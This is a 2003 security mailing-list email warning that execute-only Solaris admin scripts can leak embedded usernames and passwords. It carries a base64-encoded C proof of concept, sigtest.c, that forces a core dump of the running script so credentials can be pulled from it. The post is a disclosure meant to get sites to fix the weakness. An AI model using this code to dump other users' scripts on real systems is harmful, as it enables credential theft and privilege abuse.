Date: Wed, 12 Feb 2003 03:21:49 +0000 (GMT)
From: Jon Masters <[email protected]>
To: [email protected]Subject: Solaris Signals
---1463811584-1091147387-1045020109=:21227
Content-Type: TEXT/PLAIN; charset=US-ASCII
Hi,
We all know that old chestnut about tracing setuid programs or scripts,
but what about non-setuid scripts which have been installed for users and
given execute only permission. For example, a lot of sites provide scripts
for users to run which perform some admin related function and thus have
usernames or passwords within them - potentially free to users.
The thing I want to do is make a few people think about fixing this by
taking whatever steps are necessary on a per-installation basis. It is a
silly kind of thing which seems to be overlooked all too often. There is
some trivial code attached for those who really do not see my point.
This is bound to be covered somewhere, I just want to get viewpoints.
Jon.
---1463811584-1091147387-1045020109=:21227
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="sigtest.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.10.10302120321480.21227@router>
Content-Description:
Content-Disposition: attachment; filename="sigtest.c"
Lyogc2lndGVzdC5jDQogKiBBIHF1aWNrIGFuZCBkaXJ0eSBoYWNrIGZvciBw
cm9vZiBvZiBjb25jZXB0IGV4cGxvaXQgYWdhaW5zdCBsb2NhbCBTb2xhcmlz
DQogKiBzeXN0ZW0gc2NyaXB0cyB3aGljaCBoYXZlICt4IHBlcm1pc3Npb24g
d2l0aG91dCArci4gVGhpcyBhbGxvd3MgdGhlIHVzZXINCiAqIHRvIG9idGFp
biBhIGR1bXAgb2YgdGhlIHByb2Nlc3MgbWVtb3J5IHNwYWNlIGFuZCBydW4g
c3RyaW5ncyBvciBzaW1pbGFyDQogKiB0b29sIHRvIHF1aWNrbHkgb2J0YWlu
IHVzZWZ1bCBpbmZvcm1hdGlvbiBzdWNoIGFzIHVzZXJuYW1lcyBhbmQgcGFz
c3dvcmRzLg0KICogTW90dG86IGNhdGNoIHRob3NlIHNpZ25hbHMuDQogKg0K
ICogVXNlOiBydW4gdGhlIHByb2dyYW0sIHJlYWQgdGhlIGNvcmUgZHVtcC4g
Tm8gcm9ja2V0IHNjaWVuY2UgcmVxdWlyZWQgYW5kDQogKiBvYnZpb3VzbHkg
bm8gZXhwbG9pdCBjb2RlIGVpdGhlciBnaXZlbiBhIHN1aXRhYmxlIHNoZWxs
IGVudmlyb25tZW50LiBZZXMsDQogKiBpdCBpcyBzdHVwaWQgYnV0IGl0IGRv
ZXMgd29yayBvbiB0b28gbWFueSBzeXN0ZW1zIGFuZCBuZWVkcyB0byBiZSBm
aXhlZC4NCiAqDQogKiBDb21waWxlIHVzaW5nICJnY2MgLVdhbGwgLS1wZWRh
bnRpYy1lcnJvcnMgLW8gc2lndGVzdCBzaWd0ZXN0LmMiDQogKi8NCg0KLyog
SW5jbHVkZSB1c2VmdWwgaGVhZGVyIGZpbGVzLiAqLw0KDQojaW5jbHVkZSA8
c3RkaW8uaD4NCiNpbmNsdWRlIDx1bmlzdGQuaD4NCiNpbmNsdWRlIDxzeXMv
dHlwZXMuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2x1ZGUgPHN0
ZGxpYi5oPg0KI2luY2x1ZGUgPHNpZ25hbC5oPg0KDQojZGVmaW5lIENISUxE
X0FSR1ZfTEVOR1RIIDINCiNkZWZpbmUgVFJVRSAxDQoNCmludCBtYWluKGlu
dCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgDQogIGludCBjaGlsZF9waWQg
PSAwOw0KICBjaGFyICpjaGlsZF9hcmd2W0NISUxEX0FSR1ZfTEVOR1RIXTsN
CiAgc3RydWN0IHJsaW1pdCBybHA7DQoNCiAgaWYgKGFyZ2MgIT0gMikgew0K
ICAgIHByaW50ZigiVXNhZ2U6XG4lcyBjb21tYW5kXG4iLGFyZ3ZbMF0pOw0K
ICAgIGV4aXQoMSk7DQogIH0NCiAgY2hpbGRfYXJndlswXSA9IGFyZ3ZbMV07
DQogIA0KICBwcmludGYoIlRoZSBlbnRlcnRhaW5tZW50IHN0YXJ0cyBoZXJl
Li4uXG4iKTsNCiAgDQogIGlmICgoY2hpbGRfcGlkID0gZm9yaygpKSA9PSAw
KSB7DQoNCiAgICBpZiAoZ2V0cmxpbWl0KFJMSU1JVF9DT1JFLCAmcmxwKSAh
PSAwKSB7DQogICAgICBwcmludGYoIkNvdWxkIG5vdCBnZXQgbGltaXRzLlxu
Iik7DQogICAgICBleGl0KDEpOw0KICAgIH0gZWxzZSB7DQogICAgICBwcmlu
dGYoIlRoZSBjdXJyZW50IGxpbWl0IGlzOiAlZC5cbiIsKGludClybHAucmxp
bV9jdXIpOw0KICAgIH0NCiAgICBwcmludGYoIkkgYW0gdGhlIGNoaWxkIHBy
b2Nlc3MgYW5kIG15IHByb2Nlc3MgaWQgaXMgJWRcbiIsDQoJICAgKGludCln
ZXRwaWQoKSk7DQoNCiAgICAvKiBjaGlsZF9hcmd2WzBdID0gIi4vdGVzdF9z
Y3JpcHQuc2giOyAqLw0KICAgIGNoaWxkX2FyZ3ZbMV0gPSBOVUxMOw0KICAg
IHByaW50ZigiSW52b2tpbmcgcHJvZ3JhbTogJXNcbiIsY2hpbGRfYXJndlsw
XSk7DQogICAgZmZsdXNoKHN0ZG91dCk7DQogICAgaWYgKGV4ZWN2KGNoaWxk
X2FyZ3ZbMF0sY2hpbGRfYXJndikgPT0gLTEpIHsNCiAgICAgIHByaW50Zigi
QSBkZXNjcmlwdGl2ZSBlcnJvciBtZXNzYWdlLlxuIik7DQogICAgfQ0KICAg
IC8qIHN5c3RlbSgiL2Jpbi9scyIpOyAqLyAvKiBBbiBhbHRlcm5hdGl2ZSB3
aGljaCBmb3Jrcy4gKi8NCiAgICBwcmludGYoIlRoaXMgcG9pbnQgaXMgbmV2
ZXIgcmVhY2hlZCBub3JtYWxseVxuIik7DQogIH0gZWxzZSB7DQogICAgLyog
VGhpcyBpcyB0aGUgaG9ycmlibHkgdWdseSBiaXQgd2hlcmUgd2Ugc2xlZXAg
Zm9yIGFuIGVtcGlyaWNhbCBhbW91bnQgb2YNCiAgICAgICB0aW1lLiBPYnZp
b3VzbHkgdGhpcyBpcyBub3QgdGhlIGNvcnJlY3Qgd2F5IHRvIHdyaXRlIGEg
Z2VuZXJhbCBwdXJwb3NlDQogICAgICAgZXhwbG9pdCAtIGJ1dCB0aGF0IHdh
cyBub3QgdGhlIHBvaW50IG9mIHRoaXMgY29kZS4gR28gZml4IGlmIHlvdSBy
ZWFsbHkNCiAgICAgICBoYXZlIG5vIGxpZmUgOi0pIFBlcmhhcHMgc29tZSBz
ZW0gb3Igb3RoZXIgcHJvY2VzcyBzeW5jIGNhbiBnbyBoZXJlLiAqLw0KICAg
IHVzbGVlcCgxMDAwMCk7DQogICAgd2hpbGUoVFJVRSkgew0KICAgICAgaWYg
KGtpbGwoY2hpbGRfcGlkLFNJR1NFR1YpID09IDApIHsNCglwcmludGYoIlRo
ZSBwYWNrYWdlIHdhcyBkZWxpdmVyZWQuXG4iKTsNCglicmVhazsNCiAgICAg
IH0NCiAgICB9DQogICAgd2FpdHBpZChjaGlsZF9waWQsTlVMTCwwKTsgLyog
Y291bGQgdXNlIHdhaXQoKSBhbHNvLiAqLw0KICB9DQogIA0KICBwcmludGYo
Ik1haW4gcHJvZ3JhbSBleGl0cyBub3JtYWxseVxuIik7DQogIHJldHVybiAw
OyAvKiByZXR1cm4gc29tZXRoaW5nICovDQp9DQo=
---1463811584-1091147387-1045020109=:21227--
